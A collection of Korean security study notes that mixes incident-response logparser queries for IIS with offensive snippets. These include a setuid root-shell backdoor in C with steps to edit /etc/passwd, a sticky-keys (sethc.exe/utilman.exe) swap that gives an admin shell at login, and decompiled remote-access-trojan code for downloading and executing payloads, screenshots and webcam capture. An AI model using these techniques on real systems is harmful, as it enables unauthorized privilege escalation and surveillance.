vencedor

AMAZON SSH ATTACK

참고 : https://blog.smarthoneypot.com/in-depth-analysis-of-ssh-attacks-on-amazon-ec2/

#vi backdoor.c  //파일제작

#include<stdio.h>
main(){
     setuid(0);
     setgid(0);
     system("/bin/sh");
}

#./backdoor //실행

#vi /etc/passwd  //일반사용자 id로 접근이 가능해진다.
                      //자신의 일반사용자 id를 찾아 관리자 권한과 동일한 권한을 갖도록 수정

#passwd root

리눅스 - 프로세스 백그라운드 실행
top &

top을 백그라운드로 실행
jobs

백그라운드로 실행되는 프로그램을 확인
fg %1

백그라운드로 실행되는 top명령을 다시 불러움

WebDAV에서 사용하는 메소드
Head/Trace : 네트워크 행동을 찾고 추적하는 기능
Get : 문서 검색
Put/Post : 문서를 서버에 전달
Delete : 리소스나 컬렉션을 삭제
Mkcol : 컬렉션을 만듦
PropFind/PropPatch : 리소스와 컬렉션의 속성을 검색하고 설정
Copy/Move : 이름 공간 문맥 내에 있는 컬렉션과 리소스를 관리
Lock/Unlock : 덮어 쓰기 방지 기능
Options : 서버가 지원하는 메소드를 출력

참고 : https://www.linux.co.kr/security/webdav_vulnerablity_analysis.pdf

국산 프리 소프트웨어이고 사용하기 간편하다.

적은금액이라도 Donate...

http://www.flychk.com/

FlyExplorer 설치

Image file execution option

레지스트리 경로
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image file execution options

sethc.exe > cmd.exe     //StickyKeys (SHIFT 키를 5번 연속 클릭 시 실행, system32\sethc.exe)

utilman.exe > cmd.exe  //접근성 표시(system32\utilman.exe)

부팅 후 로그인 화면

StickyKey(sethc.exe) 및 접근성 표시(utilman.exe) 실행 시 cmd.exe가 실행

cmd 실행 후

net user administrator <password>

*StickyKeys 기능해제
Accessibility Options > Keyboard > Settings > Use shotcut(disable)

보안 이벤트 넘버

%%2305 The specified user account has expired. (532)
%%2309 The specified account's password has expired. (535)
%%2310 Account currently disabled. (531)
%%2311 Account logon time restriction violation. (530)
%%2312 User not allowed to logon at this computer. (533)
%%2313 Unknown user name or bad password. (529)

====================================================

IIS 로그 파서

MSSQL 형식으로 로그 분석

https://www.microsoft.com/en-us/download/details.aspx?displaylang=en&id=24659

logparser -i:FS "SELECT TOP 20 Path, CreationTime FROM C:\inetpub\wwwroot\*.* ORDER BY CreationTime DESC" -rtp:-1 
최근 생성된 시간을 기준으로 찾기

logparser -i:FS "SELECT TOP 20 Path, LastWriteTime FROM C:\inetpub\wwwroot\*.* ORDER BY LastWriteTime DESC" -rtp:-1
최근 수정된 파일 찾기

logparser "SELECT DISTINCT TO_LOWERCASE(cs-uri-stem) AS URL, Count(*) AS Hits FROM ex*.log WHERE sc-status=200 GROUP BY URL ORDER BY URL"    -rtp:-1  
악성 파일을 삭제할 경우 200 OK 로그 찾기

logparser -i:FS "SELECT TO_LOWERCASE(SUBSTR(Name, LAST_INDEX_OF(Name, '.'),  STRLEN(Name))) AS Extenstion, Count(*) AS Files FROM C:\inetpub \wwwroot\*.*, C:\inetpub\scripts\*.* WHERE Attribute NOT LIKE 'D%' GROUP BY Extenstion ORDER BY Files DESC" -rtp:-1 
Script Abuse 분석(exe, dll 등의 파일 찾기)

logparser "SELECT [cs-uri-stem], [cs-uri-query], Count(*) AS [Hits] FROM c:\logs\web\ex*.log WHERE sc-status = 500 GROUP BY [cs-uri-stem], [cs-uri-query] ORDER BY [hits], [cs-uri-stem] DESC" -rtp:-1 -i:iisw3c
500 에러코드 검사

logparser "SELECT TO_STRING(TO_TIMESTAMP(date, time), 'yyyy-MM-dd') AS Day, cs-uri-stem, Count(*) AS Total ex*.log WHERE (sc-status<400 or sc-status>=500) AND (TO_LOWERCASE(cs-uri-stem) LIKE '%.asp%' OR TO_LOWERCASE(cs-uri-stem) LIKE '%.exe') GROUP BY Day, cs-uri-stem ORDER BY cs-uri-stem, Day" -rtp:-1 
가장 많은 리퀘스트 히트 찾기

logparser "SELECT date, QUANTIZE(time, 3600) AS hour, sc-status, Count(*) AS Errors FROM ex03*.log WHERE sc-status>=400 GROUP BY date, hour, sc-status HAVING Errors>25 ORDER BY Error DESC" -rtp:-1 
시간당 에러수가 가장 많이 발생한 날짜 확인

logparser "SELECT DISTINCT date, cs-uri-stem, c-ip, Count(*) AS Hits FROM ex*.log GROUP BY date, c-ip, cs-uri-stem HAVING Hits>50 ORDER BY Hits DESC" -rtp:-1 
하루동안 50번이상 동일 페이지에 접속을 시도한 Client IP 찾기

logparser "SELECT cs-uri-query, Count(*) AS Total FROM ex*.log WHERE sc-status>=500 GROUP BY cs-uri-query ORDER BY Total DESC" -rtp:-1 
모든 에러 기록 확인

logparser "SELECT cs-uri-stem, sc-status, Count(*) AS Total FROM ex*.log WHERE TO_LOWERCASE(cs-uri-stem) LIKE '%.asp%' or TO_LOWERCASE(cs-uri-stem) LIKE '%.exe%' GROUP BY cs-uri-stem, sc-status ORDER BY cs-uri-stem, sc-status" -rtp:-1 
스크립트 및 Executable 파일의 HTTP 서버 코드 기록 확인

logparser "SELECT cs-uri-stem, WIN32_ERROR_DESCRIPTION(sc-win32-status) AS Error, Count(*) AS Total FROM ex*.log WHERE sc-win32-status>0 AND (TO_LOWERCASE(cs-uri-stem) LIKE '%.asp%' OR TO_LOWERCASE(cs-uri-stem) LIKE '%.exe%') GROUP BY cs-uri-stem, Error ORDER BY cs-uri-stem, Error" -rtp:-1
Win32 Status Code 분석을 통한 Attack 확인

logparser "SELECT cs-uri-stem, cs-method, Count(*) AS Total FROM ex*.log WHERE (sc-status<400 or sc-status>=500) AND (TO_LOWERCASE(cs-uri-stem) LIKE '%.asp%' or TO_LOWERCASE(cs-uri-stem) LIKE '%.exe%') GROUP BY cs-uri-stem, cs-method ORDER BY cs-uri-stem, cs-method" -rtp:-1  
HTTP 메소드 통계 분석

MD5 : deaf01d9625d4104dbdc00eba37d7fc0

사용자 시스템 정보 수집

GetComputerNameA(&Buffer, &nSize)
GetVersionExA(&VersionInformation)
GlobalMemoryStatus((LPMEMORYSTATUS)&v15)

종료 및 재부팅

case 0x1000001:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0xCu, 0);
  break;
case 0x1000002:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x6u, 0);
  break;
case 0x1000003:
  sub_300A70("SetShutdownPrivilege",1);
  ExitWindowsEx(0x4u, 0);
  break;

파일 다운로드 및 실행

wsprintfA(&v8, "abcdefg.exe");
GetTemppathA(0x104u, &CmdLine);
strcat(&CmdLine, "\\")
strcat(&CmdLine, &v8);
v1 = LoadLibraryA("urlmon.dll");
v2 = GetProcAddress(v1, "URLDownloadToFileA");
......
return WinExec(&CmdLine, 5u)

키보드/마우스 이벤트 API를 호출하여 제어

case 0x10000011:
  sub_300120(&v32);
  keybd_event(X[0], 0, 0, 0);
  sub_300170(&v32);
  break;
case 0x10000012:
  sub_300120(&v28);
  keybd_event(X[0], 0, 2u, 0);
  sub_300170(&v28);
  break;
case 0x10000013:
  sub_300120(&v30);
  SetCursorPos(*(int *)X, Y);
  sub_300170(&v30);
  break;
case 0x10000014:
  sub_300120(&v24);
  mouse_event(2u, 0, 0, 0, 0);
  sub_300170(&v24);
  break;
case 0x10000015:
  sub_300120(&v27);
  mouse_event(4u, 0, 0, 0, 0);
  sub_300170(&v27);
  break;

PC화면 스크린샷

CreateDC 함수 호출 후 전체 화면 DC 생성
CreateCompatibleDC 함수 호출 후 만들어진 전체 화면 DC를 호환되는 메모리 DC로 생성 
CreateCompatibleBitmap 함수 호출 후 비트맵을 생성 
BitBlt 함수를 호출 해서 메모리 DC에 화면 DC를 복사

v1 = this;
v2 = CreateDCA("DISPLAY", 0, 0, 0);
v3 = v2;
v4 = CreateCompatibleDC(v2);
v5 = v4;
v6 = v4;
v7 = CreateCompatibleBitmap(v3, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6));
SelectObject(v5, v7);
BitBlt(v5, 0, 0, *((_DWORD *)v1 + 5), *((_DWORD *)v1 + 6), v3, 0, 0, 0xCC0020u);
............
GetDIBits(v6, v7, 0, *((_DWORD *)v1 + 6), (LPVOID)(*((_DWORD *)v1 + 1) + *((_DWORD *)v1 + 4)), (LPBITMAPINFO)v10, 0);
DeleteDC(v6);
DeleteDC(v3);
return DeleteObject(v7);

캠 도청

capCreateCaptureWindow 함수 호출 후 캡쳐 윈도우를 생성

C&C 서버에서 capDrivaerConnec 함수 호출 후 캡쳐 드라이브와 캡쳐 윈도우를 연결
v2 = CreateWindowExA(0, "#11220", WindowName, 0x80000000u, 0, 0, 0, 0, 0, 0, 0, 0);
*(_DWORD *)(v1 + 12) = v2;
*(_DWORD *)(v1 + 16) = capCreateCaptureWindowa("CVideoCap", 1342177280, 0, 0, 0, 0, v2, 0);

Decrypted: Kaspersky releases free decryptor for CryptXXX Ransomware
출처 : http://www.bleepingcomputer.com/news/security/decrypted-kaspersky-releases-free-decryptor-for-cryptxxx-ransomware/

Effective Use Case Modeling for Security Information & Event Management

출처 : https://www.sans.org/reading-room/whitepapers/bestprac/effective-case-modeling-security-information-event-management-33319